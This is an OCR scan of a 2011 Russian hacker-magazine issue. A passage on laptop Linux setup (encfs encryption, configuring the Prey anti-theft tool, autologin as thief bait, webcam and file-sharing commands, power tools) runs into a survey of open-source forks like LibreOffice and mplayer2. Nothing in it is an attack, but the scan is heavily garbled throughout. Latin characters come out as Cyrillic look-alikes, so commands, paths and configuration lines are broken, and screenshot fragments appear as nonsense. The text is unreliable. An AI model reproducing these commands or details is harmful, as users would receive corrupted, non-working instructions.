ступ кданным. Отныне все файлы и каталоги, помещенные в десгуро, 
будутзашифрованы, а результат размещен в каталоге -/сгур\о. После 
отключения файловой системы они станут недоступны для чтения. 
Можешь проверить это: 


$ Ризегтоип* -и =/аесгур®о 
$ 1$ -1-/.сгурфо >/аесгур®о 


В десгурто можно складывать все, что ты считаешь важным и хочешь 
защитить от рук воров. Также туда можно засунуть настройки различ- 
ных программ, например, меб-браузера: 
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МИпао\ми$ как приманка 


Новый владелец ноута — твой главный помощник в деле поиска 


устройства. Многие покупатели краденых ноутбуков даже не 
подозревают о прошлом портативного девайса и без зазрения 
совести начинают использовать его для своих нужд, не заботясь 

о переустановке системы (если они вообще в курсе, что такое ОС). 
Но это справедливо только в том случае, если на ноуте установлен 
\ММЛпаом/=. Странный и непонятный для рядовых пользователей 
[/пих, скорее всего, будет быстро снесен, и все твои ухищрения 

с шифрованием и установкой Ргеу полетят в тартарары. Поэтому 
гораздо эффективнее настроить дца(-Боо\{, при котором \\ИпЧо\миз 
будет загружаться автоматически, и Ргеу будет работать уже в нем (да, 
Ргеу — кроссплатформенная софтина, которая может работать еще и 
в Апаго!). 


к 11а 
$ му —/. сопЯя8/ сИготтит —/аесгур®о 
$ 1п -5 -/аесгурфо/ сИгот1тит =/ . сопЯё/ сИгом1ит 


Такая схема отлично работает, но требует ввода команды, подключаю- 
щей епсЕ5 каждый раз, когдаты входишь в систему. Из этой ситуации 
можно выйти, настроив автоматизированное монтирование епс!5 с 
помощью рат_гпоий или скрипта, но мы не можем полагаться на эти 
инструменты, потому какони требуют сохранения пароля отзашифро- 
ванного каталога на диске. Однако общий дискомфорт можно несколько 
снизить, если написать скрипт, который будет выводить диалоговое 
окно с просьбой ввести пароль сразу после логина пользователя. Вотон: 


$\!(-/Ып/епсётоцпе.$В 

#1! /Бб1п/5И 
ЕМС=/Поте/уазуа/ .сгурфо 
ОЕС=/Поте/уазуа/аесгурто 


1+ [ 'вгер епс+$ /ргос/моип®$ | вгер $ММТ)'!="" ]; 
{Пеп 
геп1%у --Е1{1е="епсф5" --дие$1оп --Еех&="Отключить епсф5?" 
ЧЕ [ $? == 0 ] 
{Пеп 
физегтоип{ -и $0ЕС & 
в 
е15е 


геп1фу --ептгу --П14де-%ехе --+1%1е="епсф5" \ 
- -Кех«="Пароль?" | епсф$ -$ ФЕМС $ОЕС 


Делаем файл исполняемым [«сбитпод +х -/Б!п/епсЕ5 _гпоип{.$ В») и 
создаем ярлыкна рабочем столе. Еще лучше добавить скрипт в каталог 
-/.сопНа/ащо<аг(, чтобы он запускался во время старта графической 
оболочки. Теперь мы должны установить и настроить пакет Ргеу. Он 
представляет собой набор скриптов, собирающих информацию о систе- 
меи отправляющихее либо на сайт проекта, гдеты сможешь просмо- 
треть ее спомощью панели управления, либо натвой е-глац. Отсылае- 
мые данные включают в себя такую информацию, как географическое 
положение, определяемое спомощью ближайшихточек доступа МЕ! 
или СР5-модуля, текущие настройки сети, активные сетевые соедине- 
ния, данные {гасегоще, скриншот рабочего стола, список измененных 
файлов и запущенных программ, снимокс\е-камеры. Крометого, 
скрипт может заблокироватьучетную запись пользователя, вывести 
предупреждающее сообщениетипа: «Верни ноут, сволочь, я все про- 
щу>», удалить все кукисы и пароли, сохраненные браузером, атакже 
издать громкий сигнал, который позволитнайти лаптоп, если его еще 

не успели унести далеко. Итак, идем на официальный сайт программы 
[ргеурго]ес{.сого} и скачиваем последнюю Мпих-версию. На момент 
написания статьи это была версия 0.5.3. Разворачиваем архив в каталог 
/изг/зВаге: 
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[]1@тувоз “1$ /изг/эзбаге/ргеу/ргеу.зН --сВеск 


-- СНЕСК МООЕ ОН. 


{48 РКЕУ @,5.3 зргеаЧз 11$ ш1п93| 


$88 [1пух тупозт 2.6. 37-АЮСН #1 5МР РВЕЕМРТ Ргт Маг 25 15:19:98 СЕТ 2 


911 х8б 654 АМО В+Р]оп({м) 


Гоок1п9 Тог соппест1оп,., 
боЁ пефшогК соппесЁ1оп! 


Уег1Ту1пд Ргеу 1п5та1]ат1оп... 


Сгоп Даетоп Тоиупд. 
Спеск1пд Тог сгоптаб еп1гу.., 
Роупад! 


[]1п@туНо$+ ^1$ В 
Ргеу правильно настроен и готов к работе 


$ с4 /чзг/зВаге 
$ зидо ип71р -—/ргеу-090.5.3-11пих.21р 


Теперь, если ты хочешь использовать миеб-панель, расположенную 

на сайте Ргеу для отслеживания ноутбука, то переходи по адресу. 
соп{го|. ргеурго]есё.сога, регистрируйся, далее нажимай кнопку «Ада 
пем/Чемсе», вводи данные устройства, в окне настроек в панели 
«пюгплаНоп {о даНег» включай все опции (такты получишь макси- 
мально подробную информацию обустройстве]. С левой стороны экра- 
на расположена панелька «Оемсе погтайоп», в последней строке 
которой указан ключ, его нужно прописать в конфигурационный файл 
Ргеу, чтобы связать ствоим аккаунтом в панели управления. Открой 
файл /изг/зВаге/ргеу/сопйа и добавь в него следующую строку: 


де\у1се_Кеу=' ключ" 


Главное окно программы Кеуюисп 


&2 № И 


1 р мы И ” Мея: — рудьй ъебьеии плеы Фигвен о Бить Злгеют 

фи ры пера] кеты Сы 
СО мч обр АРУ 

Рыра есИ СР ааа ЗИ ны - - 
НР 

ВЕРЫ адены а | 


На РЕЕ Пой Сей | 
квт | обение у | 
фев Фата в Ви 
фытегь Гы] 
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[] Оуа1-Соге М328 Ац+Веп+1сАМО БИЛ тих 


СВеск1п9 1{ сгоп Ддаетоп 15$ гиупп1пд,.. 


Уег1Ту1пд АРТ апд Оеу1се Кец5... 


АРТ Кец 1$ \уа119. Уоцг изег ассоупТ 1$ соггес+1]уц зеф ур, 
Оем1се Кец 1$ уа]119. боод. Сиггепф эфтафиу$ 1$ ок. 


Теперь нажми на ссылку «Ассоиг{» в верхней части панели управле- 
ния, слева будетуказан АР! Кеу, его также надо добавить в конфигура- 
ционный файл: 


ар1_Кеу=' ключ" 


Теперь запусти Ргеу в режиме проверки, чтобы убедиться, что все 
работает правильно: 


$ 5! ргеу. 51! --сНеск 


Результат должен бытьтаким, как показано на скриншоте. Если этотак, 
значит, Ргеу нормально функционирует, итеперь каждый его запуск 
будет сопровождаться отсылкой информации в панельуправления 
(если, конечно, ты пометишьего как краденый в этой же панели). 
Далее следует поместить Ргеу в сгоп, чтобы он стартовал каждые 10 
минут: 


$ 5и40 $и 
$ есро "*/16 * * * * /и5г/5Наге/ргеу/ргеу.$Н > /уаг/1о/ргеу. 
105" | сгопжаь - 


Протестировать систему можно просто зайдя в панельуправления, 
выбрав устройство и установив переключатель М!51тд в положение 
«УЕ$». После этого Ргеу начнет слать отчеты. Их можно увидеть на 
главной странице панели управления, если нажать на зеленую кнопку 
«Ме\м/герог!». 

Бесплатный аккаунт Ргеу имеет ограничение натри устройства и стек 
из десяти отчетов (если придетодиннадцатый отчет, первый будет 
удален], поэтому, возможно, лучшим решением будет использовать 
Ргеу без панели управления, настроив еготак, чтобы все отчеты 
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Режи | и фол ть ва 

— мы пы 

ты . 
_ м 
а 
И 

бе Беобсоетоьабосит 
арии ет ту Бе Г 
а ваати Б за ви в Ре вене 
= ыы = ! | 


Местоположение ноутбука, указанное Ргеу, оказалось 
на 10 км дальше реального 


отправлялись сразу натвой е-плац. Однако, чтобы эта функциональ- 
ность работала правильно, ты должен иметь в своем распоряжении 
меб-сервер, по отсутствию/наличию определенной страницы на 
котором Ргеу будет принимать решение о необходимости слать отчеты 
(например, после кражи ноута ты создаешь страницу [ар{ор_гп!зеа. 
Бана сервере садресом $Ке.согт, и Ргеу, увидев это, начинает слать 
письма на указанный е-ппа{). 

Если сервер есть, просто открой конфигурационный файл и добавь в 
него следующие строки: 


$ 5и4о М! /иг/5Наге/ргеу/сопЯ9 

# Страница проверки 

спеск_иг1= "Ир: //51%е.сот/1арфор_т1$55еа.Ит1' 
# Если страница доступна — лаптоп украден 
11$$1п2_$5фафи$_соде='200' 

# Шлем отчеты по е-та11 

роз*_тмефпоЯ= 'ета11 ' 

# Ящик и адрес почтового сервера 

та11] _+0='уазуа@=2та11 .сот' 

$тЕр_зегуег=' $мЕр.та11.сот:587' 
$тЕр_ичзегпате='уазуа@=та11 . сот' 
5тёр_ра$змога= ' пароль' 


И последнее: ты должен настроить автологин, чтобы новый владелец 
ноута мог в него войти и пошарить в поисках чего-то интересного 
(авось он догадается воткнуть в ноут ЕВегпе(-кабель или подключить- 
ся кдомашнему МЕ. 

Чтобы это сделать, следует отредактировать конфигдат (бпогпе}] или 
каг [КОЕ]. В случае с 94 открываем файл /е{с/дат/си{юогл.сопЁи 
добавляем в него следующие строки: 


$ видом! /е{с/д4т/си{от.соп{ 
[даетоп] 
Т1теао#1пЕпаб1е=*гие 
Аифота*1сЁо51пЕпаб1е=+а15е 
Т1теаЁо#1п=\уазуа 
Ачцфота{1с1051п=\Уазуа 
Т1меао#1п0е1ау=5 
Оефаи1{5$е$$1оп=впоте 


Для Кат открываем файл /изг/юсаМзВаге/сопйа/каго/каглгс и пишем 
в него: 


$ зи4о м! /изг/осаИ$Паге/сопЯ9/кат/Каггс 
МоРа$$У5ег$=\уазуа 

Бефаи1{У5ег=у\уазуа 

Ацфо[о51пИ5ег=\уазуа 
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простой способ задейство- 


Самый 
камеру в Ипих 


вать ме 


Вывести изображение на экран: 


$ тр1ауег у: // 
Сделать снимок по нажатию °: 


$ тр1ауег 4\:// -уЕ зсгееп$Во* 
Записать видео в файл: 


$ тепсодег +\:// -оус Таус -о мебсат. а\у1 


Если ты используешь $ в качестве менеджера входа в систему, то 
добавь следующие строки в файл /е{с/5{ит.сопЁ: 


$ зидо м! /ес/5$Ит.соп! 
ефау1*_изег уазуа 
ацфо_ 1о81п уе$ 


Обмен инфой 


Часто ноутбук приходится использовать как доступный под рукой 
носитель информации, который можно быстро подключить к чужой ло- 
кальной сети и произвести обмен данными с другими хостами. Вопрос 
только в том, как проще всего и быстрее это сделать. 

Почти все дистрибутивы !пих включают в себя 5МВ-клиенти 
сервер [5агпа], который можно использовать для обмена файла- 
мис \\Ип9о\м/5-машинами. Но мнетакой подход кажется слишком 
громоздким, тем более, он скорее всего не сработает, если на 
другом компе установлена какая-нибудь ЕгееВЪО, или это вообще 
смартфон. 

В этом случае спасут старые добрые протоколы ЕТР и НТТР. Например, 
чтобы расшарить каталог по ЕТР, в большинстве систем достаточно 
установить Вр-сервер: 


$ 5и40 ар*-ве* 1п5%а11 мера 


И сложить все файлы в каталог /погпе/р [внутри него можно создать 
каталог риб, тогда другие пользователи смогутеще и заливать файлы). 
Еще проще поднять простой ме-сервер: 


$ 5и40 ар*-ве* 1п5+а11 меб $ 
$ мебР5а -р 8080 -г /путь/до/каталога 


В браузере вводим ПНр://1Р-адрес:8080. 


Расширение функциональности 


Клавиатура ноутбука может иметь несколько специальных кла- 
виш, используемых для управления какими-либо функциями. 
Дополнительные элементы управления могут располагаться и на 
корпусе устройства. Часто они отказываются работать прямо из 
коробки, поэтому нужна программа, которая могла бы их активи- 
ровать. 

Линуксоиды старой школы для настройки клавиш на свой вкус исполь- 
зуют инструмент хпподгпар, однако это слишком хардкорный способ. 
Гораздо проще воспользоваться графической программой Ке\{оисй 
(КеочцсВ.5пе\), которая уже имеет преднастроенные карты клавиш 
для многих мультимедийных и ноутбучных клавиатур. 
Пакет с программой есть влюбом дистрибутиве, так что для установки 
просто выполняем привычную команду: 


$ зи40 ар*-ве* 1п5+а11 Кеуфоисй 


После запуска программа предложит выбрать производителя и модель 
клавиатуры/ноутбука. Возможно, в списке не окажется твоей модели, 
ноты можешь попробовать другие модели (обычно производители со- 
храняют совместимость в расположении клавиш между ними). 


ХАКЕР 07 /150/ 2011 


Зупопгогитаноп АсНопз 


упоге 50“ Нер 
| © = 


а 


ох 


тей то АБЫ 


ргойе: Феба Е 
+ < о = № 
Мегде ОН Герай СПапде Ргое 


—й 
| пении Ка —-* 
| пеми Чт — 
Глен Не — 
гении г —+ 
гнаниг Ва — Г2сапм ЗВ 
| гнева С — фКогеегУ | 
Гиви Фиг < Гевбуре-2,1,4 | 
нему Пе — пГеегуре-рл9 дот 
Гении С —+ ефаггис-- 63 
| пени Фг —+ т | 
гаи ФГ — ифеггьо- 05 | 
Гуам г —* те 
Гнаму Н[е —=, НЬ-сН-ргоН 
гам Не —* гла оп99 492 
Гиениг Ве —* гие. $ К 
геи г — пом г 
гам На —= расглаг, 19? 
геи иг — [| 
пении СГ — сратт 
Плечи Ве — гес\о9.Ь 
геи Не — гоБзксо|ь 
Рам На —+ $ИЗег$.5Р 
| гнал г —* 55А 
| ем Ще — эчЬЕ.Б [= 
апаппа(е 58 
гс = пам а пет 18 оп 2011-05-05 аЕ 21:29:55 51:8 1413 гиг. Г. . 
|6гс2 : аБеепте 
| СРеск агГог адих зеестед эсногиз: Пуеп рге5$ бо р 


В отличие от ОгорБох, Упбоп позволяет проводить синхронизацию индивидуально для каждого файла 


Тачпад — другой элемент управления, который может потребо- 
вать дополнительной «доводки». Но здесь все проще: почти все 
ноутбуки оснащаются сенсорными панелями фирмы эупарисс, 
для настройки которых в !пих есть отличный графический 
инструмент под названием дзупарИс$ (в сущности, это просто 
надстройка над консольной программой эупсЦеп(, поставляемой 
вместе сХ.ого]. 


$ зи40 ар*-ве* 1п5%а11 взупар1с$ 


Далее запускаем программу и видим перед собой окно настройки. Оно 
состоит из четырех вкладок с очевидными названиями. Здесь можно 
настроить все, начиная от чувствительности сенсора и заканчивая 
«круговой прокруткой». 


Батарея 


Ноутбук работает отбатареи, поэтому очень чувствителен кжадным до 
процессорных и других ресурсов программам. Чтобы выявитьтакие 
программы и убить их в случае необходимости, можно использовать 
утилиту ромецор, которая покажет процессы, в ходе исполнения кото- 
рых система потребляет больше всего энергии. 

Устанавливаем программу и запускаем ее: 


$ ид0 ар*-ве* 1п5%а11 ромег®ор 
$ зидо ромегфор 


Ждем пять секунд, получаем доступ к{ор-подобному псевдографиче- 
скому интерфейсу. В верхней части окна показаны поддерживаемые 
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процессором режимы энергосбережения и количество времени, 
которое он провел в каждом из режимов. Нижняя часть окна — список 
самых прожорливых процессов, отсортированный сверху вниз. Его 
нужно внимательно проанализировать и, по возможности, избавить- 
ся отне особо нужных [хотя бы нато время, пока ноутбук работает от 
батареи). 

Некоторые железные компоненты ноутбука М/Р!-адаптер, например] 
также могут быть отключены во имя энергосбережения. Отключить 
их можно с помощью программы |ирКег, которая представляет собой 
интерфейс, в котором собраны все самые необходимые инструменты 
управления ноутбуком. 

Итак, устанавливаем: 


$ зи4о ар*-веф 1п$$а11 ]ир1*ег 


Далее запускаем программу. В трее появляется значок, по клику 
на котором вываливается меню, через которое можно сделать 
следующее: 

® Перевести лаптоп в энергосберегающий режим. 

® Отключить тачпад (чтобы не мешал печатать} и модуль МЕ. 

® Изменить разрешение и ориентацию экрана. 

® Включить/отключить дополнительные видеовыходы. 


Выводы 


Ноутбук действительно мало чем отличается от обычного компа, но как 
ты смогубедиться, он требует «особого отношения». Используя опи- 
санные в статье программы, ты сможешь сделать свою работу с ноутом 
гораздо более продуктивной. == 
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м м Юрий «Адер» Видинеев (адер{9@дтаЦ.сот) 


ЭНЕРГИЯ 


ПОЛУРАСПАДА 


вре 


0630 ор самых интересных форков последнего 


® Форк вбирает в себя самое лучшее из прототипа и является дви- 
жущей силой в мире Орепзоигсе. Но это один из тех механизмов, 

к которым прибегают, как правило, только в том случае, когда при- 
ити к какому-нибудь компромиссу не удается. Ведь разветвление 
может негативно сказаться на темпах развития проекта. 


Свободный офис 


[6геОЁИсе — самый масштабный форк последнего времени. Во- 
обще, предпосылки кего появлению возникли еще вто время, 
когда развитием ОрепО се занималась Зип. Многие разработ- 
чики были недовольны процессом разработки: отсутствием ре- 
альных лидеров в проекте, жестким руководством, недостаточной 
прозрачностью, необходимостью подписывать с $ип соглашение 
о передаче авторских прав на код для включения его в ир{геат. 
Все эти проблемы привели ктому, что количество активных раз- 
работчиков со временем только уменьшалось. Некоторые из них 
[при поддержке, в основном, МоуеЦ] поддерживали набор патчей 
для актуальной версии ООо, существенно расширяющих функ- 
циональность. Эта сборка даже носила отдельно имя — бо-00 

и могла похвастаться поддержкой УВА-макросов, улучшенной 
поддержкой бинарных форматов М!сгозо и ООХМЕ(,, оптимизаци- 
ей производительности и многим другим. До недавнего времени 
большинство дистрибутивов [505Е, Оеап, УБипфи и другие] 
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включали в свой состав именно сборку бо-О0. Надо отметить, 
что бо-00 — это не полноценный Форк, а просто набор патчей 

— то есть, его релизы жестко завязаны на релизы ванильного 
ОрепО! се. 

Время шло, а подход к разработке Ореп01Т!се в Зип не менялся. 
Но вот стало известно, что Огас(е покупает Зип. В связи с этим 
некоторые надежды возлагались на то, что после сделки раз- 
работка станет более открытой. Но Огас[е не оправдал надежд 
сообщества, поэтому группа ведущих разработчиков решилась 
сделать форк, создав для этого некоммерческую организацию 
Поситеп( Еоипдайоп. Ключевыми особенностями нового процес- 
са разработки стали полная независимость от какой-либо одной 
организации и открытость для всех желающих (больше не нужно 
передавать авторские права на код]. К Ооситеп{ РоипдаНоп 
быстро присоединились такие компании и организации, как ЕЪЕ, 
0А$$, СМОМЕ Еоипданоп, боод(е, МоуеЦ, Кеа На\, Сапопгса! 
(полный список на май 2011 года включает 39 членов — 900.9 
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Экспериментальные возможности в 
ИбгеО се 


Цаснм). Огас(е тоже было отправлено предложение 

о вступлении, а заодно — просьба передать новой 
организации права на торговую марку Ореп01се.огод. 
Огас(е отказалась, более того — попросила участников 
оситеп{ Гоипдайоп покинуть совет Ореп01се.ого. 
Четыре человека покинули совет, а для нового офис- 
ного пакета была выбрана торговая марка [!БгеО!Исе. 
Дальше события развивались стремительно. Сразу 
после объявления о создании Ооситеп* ЕочпдаНоп 
[28 сентября 2010 года] вышла первая бета-версия 
[6геО! се 3.3.0 [нумерация версий была позаим- 
ствованау ОО}, которая, по сути, представляла собой 
Со-00. Участники приступили к созданию инфра- 
структуры: м/т, [ВС, списков рассылок [на 13 языках 
мира, в том числе и русском]. В течение первой не- 
дели бета-версию скачали более 80000 раз. Количе- 
ство зеркал проекта выросло до 45 [в 25 странах). В 
среднем, на |КС-канале разработчиков постоянно на- 
ходилось около 100 человек, а количество сообщений 
составило 14000. Две тысячи человек подписались на 
почтовую рассылку с анонсами, триста человек — на 
рассылку с дискуссией. В Тм ег количество фолло- 
веров выросло до шестисот. Примерно через месяц с 
момента основания проекта количество коммиттеров 
перевалило за сотню, 20 из них Ц те (Вед На\, 
МоуеЦ, Сапоп!сай. 

Первый стабильный релиз вышел 5 января 2011 года 
и был скачан больше 1,3 миллиона раз. После выхода 
релиза 3.3 Воситеп( Еоипданоп организовала сбор 
средств, необходимых для официальной регистрации 
организации в Германии. Нужную сумму [50000 евро] 
набрали за 8 дней! 

[БгеОЁйсе 3.3 перенял все улучшения Ореп0йсе.ога 
3.3 [переработанный диалог печати, поле для поиска 
на панели инструментов, возможность задать пароль 
на редактирование документа, число строк в таблицах 
Сас увеличено с 65000 до 1 миллиона и многое дру- 
гое), атакже получил ряд уникальных функций: 

® Возможность импорта и редактирования 5\С- 
изображений; 

® Мастер для облегчения создания титульных страниц 
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ни БтреягТ 1 
ИбгеО®се \М/тег выглядит пока один в один как ОрепОМсе \ММтег 
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= 


(М/гкег): 

® Был серьезно доработан инструмент «Навигатор» 
(тот, который по умолчанию забинден на <Ё5>}, в 
частности, все заголовки теперь могут отображаться 
древовидно; 

® Возможность импорта документов М5 \\Могк5 и [Го{и$ 
ога Рго, сильно улучшен импорт файлов \\!огаРег!есЕ; 
» Добавлен режим, включающий некоторые экспери- 
ментальные функции (например, интерактивное ре- 
дактирование формул в документе], стабильная работа 
которых не гарантируется. Функция активируется в 
«Сервис-> Параметры - 1 16ге0Ё се -> Включить экс- 
периментальные (нестабильные] возможности»; 

® Поддержка трех разных синтаксисов определения 
формул: Сас АТ, Ехсе[ АТ и Ехсе[ КТСТ; 

® Ускорение импорта ОО5, Ехсе| и ОВЕ; улучшена со- 
вместимость с Ехсе(, добавлена поддержка импорта 
диаграмм в формате ррих. 

Многие дистрибутивы включили [1 1Бге01{!се 3.3 вместо 
ОрепОЁ се в поставку по умолчанию: Убип{и 11.04, 
Гедога 15, ореп 5 0ЪЕ 11.4, Мапдгма 2011. !6геО се 
будет участвовать в боод(е Зиттего! Соде 2011 с 
несколькими проектами [самый интересный из них, на 
мой взгляд, — возможность импорта \/1510-файлов). 


Мультимедиа войны 


Реальность мира Орепбоигсе такова, что любой более- 
менее большой проектс более-менее долгой историей 
периодически форкают. Причем, нередки случаи, 

что форк поддерживается одним разработчиком. До 
того момента, пока ему не надоест. Этой же участи не 
удалось избежать и пр[ауег (которому, кстати, в конце 
прошлого года исполнилось 10 лет}. Довольно из- 
вестен форк под названием тр(ауегхр, использующий 
многопотоковое ядро (к слову, ванильный пр(ауег 
тоже с недавних пор умеет декодировать видео в 
несколько потоков]. Менее известен форк тр(ауег- 
Мими — МЛпдо\м/$-оп(у, многопоточный, с поддержкой 
воспроизведения формата РМР (Р\ау5{аНоп Роща {®}, 
поддержкой ОЗР-плагинов млпатр и множеством 
других мелких изменений. Совсем недавно появился 
новый форк — ни много ни мало — тр[ауег2. Причины 
создания форка до конца не ясны, а список основных 
отличий содержит следующие пункты: 

® улучшенная обработка пауз. В ванильном тр(ауег 
выполнение любой команды снимает паузу. В 
пр(ауег2 такое поведение исправлено; 
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® 900.9 /А\М/Н2р 
— блог Ооситеп( 


ГоипдаНоп 

® 900.9/0Т678 — 
полный сПапде(09 
[6геОЁИсе 3.3 

® 900. /9ВВуВ — 
список проектов 


[6геО се на бооце 
5ититег оЁ Соде 2011 
® 900.9 И8СКЕ — 
сравнение |стда и 
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Форки всех времен и народов 


Кроме описанных в статье, можно выделить следующие проекты- 
форки, затмившие свои оригиналы: 


® Н/геох — браузер №72 по популярности в мире. Родился как форк 
Мо7Ща АррИсаНоп ЗиКе путем отсечения всего лишнего; 

® Х.Огд — форк ХЁГгее86, возникший, в основном, из-за разногласий 
по поводу лицензии; 

» Обити — форк Оешап, дистрибутив №1 на десктопах с жестким 
циклом релизов; 

® ОрепВ$0 — самый секурный вариант ВЪО. Мало кто помнит, что 
это форк Ме{ВЗО, возникший в 1995 году из-за конфликта среди 
разработчиков; 

® ]оопта — одна из самых популярных СМ5, начала свое развитие 
как форк когда-то популярной СМ$ Матьо. 


® улучшение поддержки формата Ма{гозкКа; 

® автоматическая поддержка многопоточности без необходимо- 
сти отдельного конфигурирования; 

® улучшенная поддержка технологии Мм! Ч!а УБРАЧ, позволяющей 
перекладывать декодирование видеопотока на СРИ; 

» убрана зависимость от встроенной версии ЕЕ тред, переход на 
использование стандартного ЕЕтред АРТ; 

® удалили тепсодег (мотивировав это тем, что у него ужасный 
код, который нереально поддерживать}. Обещают в следующих 
версиях предложить какое-нибудь свое решение, в частности, 
некоторые функции перекодирования планируется возложить на 
сам гпр(ауег2; 

® удален штатный С Ц|-интерфейс. 

Для тестирования доступен релиз-кандидат версии 2.0, который 
пока полностью совместим с оригинальным тр(ауег. Вродебы, 
сама по себе идея неплоха, но активность в багтрекере проекта 
и списках рассылки показывает, что если проект не поддержит 
широкая общественность — это будет очередной всеми забытый 
форк. 

СШ к тр(ауег форкаютеще чаще. Встречайте новичка — 
ОМР|уег, форк 5МРуег. Недавно вышла версия 1.0, хотя, судя 
по количеству багов в багтрекере и отзывам, зря его уже назвали 
релизом. В отличие от прародителя, форк доступен не только под 
М/паом/5 и пих, но и под Мас 05 Х. Другие его особенности: 

® скины написаны на СЪ5. В комплект поставки уже включено 
несколько скинов; 

» умеет искать, воспроизводить и сохранять ролики с Уощибе; 

® умеет проигрывать 5НОЧТса<{-потоки; 

® поиск субтитров на орепзи И Цез.ога. 

Обычно форк — достаточно мирное мероприятие. Максимум — 
часть разработчиков уходит, громко хлопнув дверью и сказав что- 


нибудь нелицеприятное напоследок. Но случаются и исключения. 


Например, с ЕЕтред — в начале года группа разработчиков 
попыталась совершить «государственный переворот». Причем, 
ни у кого из этой группы не было права записи изменений в 9(- 
репозиторий, поэтому они просто его склонировали и поменяли 
ссылку на сайте на новый, заодно максимально урезав права 
остальным членам сообщества. Мотивами такого поступка послу- 
жили многочисленные проблемы в процессе разработки, которые 
не решаются годами, снижение темпа развития проекта, а также 
то, что проект, фактически, находится в руках одного мейнтейне- 
ра. В общем, со стороны ситуация выглядит очень некрасиво. По- 
сле продолжающихся несколько месяцев переговоров и метаний 
группа «революционеров» все же решила, что сделать форк — 
правильнее. Назвали форк ау. Одна из основных технических 
целей форка — устранение фрагментации проекта на большое 
количество вспомогательных библиотек. 
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ИбгеО Я се 


Е Форки не для всех 


Нередкое явление и форки узкоспециализированных проектов. 
Вот несколько недавних. 

От проекта боза откололся форк ГизопОигесогу. боза — 
специализированная веб-морда к ГОАР для управления учетными 
записями пользователей, рабочих станций, группами, правами и 
многим другим. Причина форка: разработкой боза занимается, 

в основном, немецкая компания СОМ!СУ$ СтьЬН, и внесение 
изменений (особенно, в ядро] сторонними разработчиками 
затруднено. 

Система управления проектами Кедплте была форкнута 
небольшим количеством старых разработчиков. Форк получил 
название СВИРго|ес{, а произошло это в феврале 2011 года. 
Мотивы форка — сделать процесс разработки (в особенности, 
принятия новых патчей в ир®{геат] более прозрачным, улучшить 
взаимодействие СЫИРго]ес( с другими проектами и сопти- 

пКу. Цели достойные, но пока форк развивается существенно 
медленнее оригинала. 

Система непрерывной интеграции Ни95оп — довольно известный 
в узких кругах проект ип, который ныне принадлежит ОгасЕ. 

В ноябре 2010 года на хостинге проекта (ауа.пе] были без 
предупреждения заблокированы списки рассылки и репозитории 
(как потом выяснилось — в связи с обновлением). Разработчикам 
это не понравилось, и они перенесли код на 9КПиБ, заодно 
переименовав проект в /епКипз [так как Огас{е отказалась передать 
сообществу имя Нидзоп]. Правда, некоторое время спустя у Огасе 
появилось желание передать Нид5оп под управление сообщества, а 
конкретно — организации ЕсИрзе Гоупдайоп. 

Программ для мониторинга сети Ет{егрте-уровня с Ореп5оигсе- 
лицензией очень мало. Относительно недавно одна из них, Мад!о$, 
обзавелась форком под названием |стда. Форк был реакцией на 
чрезмерное «закручивание гаек» компанией Мадю$ Ещегргт5е®. 
Сегодня [стда развивается гораздо быстрее своего «прародителя» 
и уже имеет множество собственных фишек, среди которых: 

® Переработан классический веб-интерфейс на С и написан 
новый, альтернативный на РНР и Дах; 

® Данные мониторинга можно хранить в БД. Пользователей 
системы тоже можно хранить в БД [или в [ОАР); 

® Полная поддержка |Р\б, а также возможность мониторинга 
смешанных |Руб/ЛР\4-сетей; 

® Наличие АР! (ХМЕ, /50М, $0АР}; 

® Возможность конфигурирования из веб-интерфейса. 

При этом |стда пытается сохранить максимальную совместимость 
с Мад10°5. 

Игры тоже форкают. Недавний тому пример — довольно 
популярный ЕР$5 Мехшх. Один из основателей проекта (ее \ег- 
пещеп), который уже очень долгое время в проекте не участвовал, 
передал права на код и название молодой игровой компании 

| ог!с. Компания закрывает код (который ранее распространялся 
только под лицензией СРИ и разрабатывает версию для игровых 
консолей. Сообщество ответило на эти действия созданием форка 
под названием Хопойс. Планируется в дальнейшем избежать 
ситуаций, в которых весь код будет принадлежать только одному 
человеку. 


Битвы титанов 


Довольно часто бывает, что разработчики не мелочатся и делают 
форк целых дистрибутивов/ОС. 

Последнее время делау Мапапуа шли совсем неважно — компа- 
ния потеряла около 30 миллионов евро и вынуждена была уволить 
большое количество своих сотрудников. Чтобы спасти дистри- 
бутив, бывшие сотрудники и члены сообщества сделали форк 
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— Маде!а, управляемый независимой некоммерческой органи- 
зацией. Первый релиз нового дистрибутива с точки зрения поль- 
зователя практически ничем не отличается от Мапамма 2010.1: 
лишь ребрендинг, новые версии пакетов и замена Ореп0 "се на 
[/бге0ОЁИсе. 

С точки зрения сообщества, наоборот, была проделана огромная 
работа — с нуля создана вся инфраструктура: система для сборки 
пакетов [с помощью которой собрано больше 10000 пакетов}, сайт 
(блог, млКИ, багтрекер, списки рассылок, форумы, |РС-каналы и 
многое другое. В общем, первая версия — это проба сил сообще- 
ства и инфраструктуры. Касательно грядущих версий четких пла- 
нов пока нет. Тем временем, Мапаг!ма тоже готовится к следующе- 
му релизу — Мапаг!ма 2011, который запланирован на середину 
июня. Время покажет, который из дистрибутивов-близнецов 
окажется жизнеспособнее. 

Гораздо более интересен в плане перспектив форк Апаго!а 

под названием |седаКоро{, который пока развивают всего два 
разработчика. Цель форка — заменить Ва\мК Уа( Масбте 
[реализация /ауа, которая используется в Апаго!а] на Ореп ОК 
(реализация /ауа, распространяющаяся под СР), при этом не 
потеряв совместимости с уже написанными приложениями. Для 
этого планируется сначала модифицировать ОаМК так, чтобы он 
не зависел от используемого в Апаго!4 ядра. Затем нужно будет 
создать прослойку, преобразующую байткод Па\МК в байткод 
Ореп 0) К. Плюсов оттакого перехода два: 

® возможность запускать Апаго!9-приложения везде, где работает 
Ореп 0 К; 

» кОреп ОК нет никаких претензий по поводу нарушенных па- 
тентов [по крайней мере, у основных игроков рынка в настоящее 
время). 

Иногда история форков ОС принимает причудливые формы. 
Жил-был себе Оефап, и однажды на его основе сделали форк — 
Обипти, который по популярности на десктопах в разы обошел 
своего прародителя. 

Через некоторое время уже на основе УбБип(и сделали еще один 
дистрибутив для десктопа — 11пих МитЕ, который по популярности 
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Пока в проекте СЬЙРгоес! катастрофически мало 


| 


участников 


Современная ЦБити с КОЕ 3.5 


догоняет ЧУбип\и [по крайней мере, на 9!5{гом/а{сВ.согл он уже 
давно и уверенно держится на втором месте). Кстати, недавно 
вышел релиз за номером 11 [кодовое имя Ка{уа], который от 
Обипеи 11.04 отличается отсутствием Ипиу (вместо него — ста- 
рый добрый ламповый Споте 2.32], наличием кодеков (а также 
Казпр(ауег, ипгаг} из коробки [только в ОУ) -редакции], фирмен- 
